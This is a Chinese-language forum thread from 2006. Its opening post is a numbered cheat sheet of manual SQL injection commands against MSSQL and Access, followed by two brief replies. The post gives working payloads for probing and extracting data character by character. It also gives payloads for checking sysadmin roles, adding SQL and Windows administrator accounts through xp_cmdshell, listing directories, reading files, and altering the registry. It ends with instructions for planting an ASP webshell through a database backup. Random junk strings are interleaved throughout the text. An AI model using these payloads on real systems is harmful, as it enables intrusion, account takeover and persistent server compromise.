社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 4418阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 B\r2M`N5  
  2.初步判断是否是mssql ;and user>0 !?Gt5$f  
;e4 15T  
  3.注入参数是字符'and [查询条件] and ''=' 9+ nB;vA  
Ci4`,  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' VdjS\VYe,  
H=9kDP${  
  5.判断数据库系统 ExeD3Zj  
)=;GQ*<8Zs  
  ;and (select count(*) from sysobjects)>0 mssql R8I%Cyc  
SE.r 'J0  
  ;and (select count(*) from msysobjects)>0 access dKTyh:_{  
3p6QJuSB  
Oq@+/UWX  
f(:+JH<P~  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 u,AP$+Qk  
B(7oHj.i2  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 "XfCLc1 T  
y$|%K3  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 yhv(KI  
|tIr?nXSW3  
  9.(1)猜字段的ascii值(access) ug{@rt/"Z  
~~a,Fyko2  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ]$Pl[Vegy  
x? tC2L  
  (2)猜字段的ascii值(mssql) 1DgR V7  
WvR-0>E  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 \(2w/~  
I{tY;b'w  
  10.测试权限结构(mssql) `-fWNHs  
Y[)b".K  
e+6mbJ7y  
pFgpAxl  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- qmqWMLfC  
5xC4lT/U  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- s!,m,l[P  
CX?q%o2b  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 3 9to5 s,  
6D|[3rXr  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- pMB!I9q  
L#O1 >  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hb#Nm6  
LvtHWt  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- U{i xok  
IR;l{q&`  
  ;and 1=(select IS_MEMBER('db_owner'));-- vZ,DJ//U,  
R d'P\  
Gu+9R>  
2?P H||  
  11.添加mssql和系统的帐户 2(LF @xb  
K+MSjQS"  
  ;exec master.dbo.sp_addlogin username;-- r5 tn'  
  ;exec master.dbo.sp_password null,username,password;-- X)oxNxZ[A  
m%m<-.'-  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 0DtewN{Z  
jq%%|J.x  
  ;exec master.dbo.xp_cmdshell 'net user username password '&hz *yk  
Ak3cE_*Y/  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- %O6r  
!yqe z  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- "Vh3hnS~  
p3r("\Za,  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- GsIVx!  
6_|iXs(&  
z^lcc7  
m%zo? e  
  12.(1)遍历目录 +t*V7nW  
j9gn7LS  
  ;create table dirs(paths varchar(100), id int) i(T[  
`-t8ag 3  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' <*JFY%y "  
/pY-how%!  
  ;and (select top 1 paths from dirs)>0 GDF/0-/Z  
aeZ$Wu>]W  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) pwvzs`[;  
eH HY.^|  
(#kKL??W  
Hjhgu=  
  (2)遍历目录 &~mJ ).*  
y0vJ@ %`  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- H9;0$Y(e-  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ;~D$ rT  
yFoPCA86y  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 $%BI8_  
<W] RyEg`  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 o|:c{pwq  
n%|og^\0  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 PRJ  
8[b_E5!V  
ES-V'[+jDy  
9|D*}OY>  
  13.mssql中的存储过程 e5RF6roxO  
I(<9e"1O  
  xp_regenumvalues 注册表根键, 子键 Az7 ] qb  
:@uIEvD?  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 (1EtC{ m  
6VUs:iO1j5  
  xp_regread 根键,子键,键值名 KH$|wv  
s&hJ[$i  
  ;exec xp_regread E1r-$gf_  
}7non  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 b5Q|$E   
M"Dv -#f  
  xp_regwrite 根键,子键, 值名, 值类型, 值 L4DT*(;!E  
f=k_U[b4>  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0$A^ .M;  
Hf /ZaBn  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 JDJ"D\85  
TAxu]C$P  
  xp_regdeletevalue 根键,子键,值名 3 Fb9\2<H  
\sBXS.  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 X[<%T}s#  
ho-#Xbq#g  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /KLkrW  
zmU@ k  
SZ29B  
l+#J oc<8  
  14.mssql的backup创建webshell 0iYo&q'n  
_01wRsm%2  
  use model nb<e<>L  
u,V_j|(e  
  create table cmd(str image); _tUh*"e&  
V&*|%,q   
  insert into cmd(str) values (''); iYZn`OAx  
_9g-D9  
  backup database model to disk='c:\l.asp'; O8 OAXRt/Y  
(xfh 9=.  
.TMLg(2hgv  
NbC2N)L4  
  15.mssql内置函数 KomMzG:  
MaPOmS8?  
  ;and (select @@version)>0 获得Windows的版本号 fat;5XL@  
3eg6 CdT  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa ^T:L6:  
ph}%Ay$  
  ;and (select user_name())>0 爆当前系统的连接用户 ^@3,/dH1 t  
U9ZuD40\  
  ;and (select db_name())>0 得到当前连接的数据库 It7R}0Smg  
X n8&&w"  
SRtw  
Jz}`-fU`  
  16.简洁的webshell VKkvf"X  
QM![tZt%;  
  use model o\F>K'  
a:8 MoH4  
  create table cmd(str image); ;4U"y8PVTh  
l?QA;9_R'  
  insert into cmd(str) values (''); 2eHVl.C5  
9: .m]QN  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
如果您在写长篇帖子又不马上发表,建议存为草稿
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八